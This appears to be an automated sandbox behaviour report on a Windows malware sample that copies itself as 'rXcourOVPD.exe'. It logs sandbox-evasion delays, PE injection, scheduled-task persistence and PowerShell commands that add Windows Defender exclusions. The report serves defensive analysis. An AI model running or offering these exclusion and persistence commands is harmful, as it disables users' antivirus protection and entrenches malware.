Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596421	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595546	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595326	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594988	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594749	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 599433
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 599108
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 598777
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 598671
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 598561
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 598452
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 598343
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 598124
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 597468
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 597357
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 597140
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 597027
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 596806
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 596687
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 596578
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 596468
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 596359
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 596250
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 596140
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 596014
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 595796
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 595687
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 595578
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 595468
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 595250
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 595140
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 595028
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 594922
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 594812
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 594703
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Thread delayed: delay time: 594593

Source: file.exe, 0000000E.00000002.3758725117.0000000000F76000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
Source: rXcourOVPD.exe, 00000014.00000002.3758152325.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 14_2_05967588 LdrInitializeThunk,

14_2_05967588

Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rXcourOVPD.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rXcourOVPD.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Memory written: C:\Users\user\AppData\Roaming\rXcourOVPD.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rXcourOVPD.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmp9DEF.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmpAA33.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Process created: C:\Users\user\AppData\Roaming\rXcourOVPD.exe "C:\Users\user\AppData\Roaming\rXcourOVPD.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Process created: C:\Users\user\AppData\Roaming\rXcourOVPD.exe "C:\Users\user\AppData\Roaming\rXcourOVPD.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Process created: C:\Users\user\AppData\Roaming\rXcourOVPD.exe "C:\Users\user\AppData\Roaming\rXcourOVPD.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Queries volume information: C:\Users\user\AppData\Roaming\rXcourOVPD.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
